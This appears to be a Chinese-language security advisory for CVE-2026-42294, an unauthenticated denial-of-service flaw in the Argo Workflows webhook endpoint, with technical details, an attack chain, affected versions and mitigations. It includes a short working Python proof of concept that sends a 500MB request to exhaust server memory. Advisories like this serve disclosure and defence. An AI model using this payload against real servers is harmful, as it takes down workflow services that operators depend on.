CVE-2026-42294 CVSS 7.5 高危

CVE-2026-42294 Argo Workflows Webhook拒绝服务漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42294

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Argo Workflows

漏洞概述

Argo Workflows在3.7.14和4.0.5版本之前存在高危拒绝服务漏洞。由于Webhook Interceptor在处理/api/v1/events/端点请求时，未在身份验证或签名校验前限制请求体大小，直接将完整请求加载至内存。攻击者可利用此漏洞发送超大恶意请求包，致使Argo Server内存耗尽崩溃，从而导致服务拒绝。

技术细节

该漏洞源于Argo Workflows的Webhook Interceptor组件在处理请求时的逻辑缺陷。在受影响版本中，当服务器接收到发往`/api/v1/events/`端点的请求时，会首先尝试读取并将整个HTTP请求体加载到内存中，而在此过程中并未对请求体的大小进行限制，也未优先执行身份验证或签名校验。这种“先加载，后验证”的机制为攻击者提供了可乘之机。攻击者无需任何用户凭证或交互，即可向该公开接口发送恶意构造的超大请求包（例如数GB的数据）。当Argo Server尝试分配内存以容纳该请求体时，会迅速耗尽容器或主机的可用内存资源。这通常会导致系统触发OOM（Out-Of-Memory）机制，强制终止Argo Server进程，从而造成拒绝服务攻击，严重影响Kubernetes集群上的工作流调度。

攻击链分析

STEP 1

侦察

攻击者识别暴露的Argo Workflows服务器及其/api/v1/events/端点。

STEP 2

漏洞利用

攻击者向该端点发送一个包含巨大Body数据的HTTP POST请求，无需认证。

STEP 3

资源耗尽

Argo Server尝试将请求体加载到内存，导致系统内存迅速耗尽。

STEP 4

拒绝服务

系统触发OOM Killer机制，终止Argo Server进程，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable Argo Workflows server
target_url = "http://target-argo-server:2746/api/v1/events/"

# Generate a large payload to trigger OOM
# 500MB payload to exhaust memory
large_payload = b"A" * (500 * 1024 * 1024)

try:
    print("Sending large payload to trigger OOM...")
    # Exploit the unauthenticated endpoint
    response = requests.post(target_url, data=large_payload, timeout=10)
    print(f"Response status code: {response.status_code}")
except Exception as e:
    print(f"Request failed (server likely crashed): {e}")

影响范围

Argo Workflows < 3.7.14

Argo Workflows < 4.0.5

防御指南

临时缓解措施

建议立即升级至Argo Workflows 3.7.14或4.0.5及以上版本。如果无法立即升级，应在Ingress控制器或API网关处配置请求体大小限制策略（例如limit body size to 1MB），阻断发送至`/api/v1/events/`端点的特大请求包，并限制该端点的来源IP访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表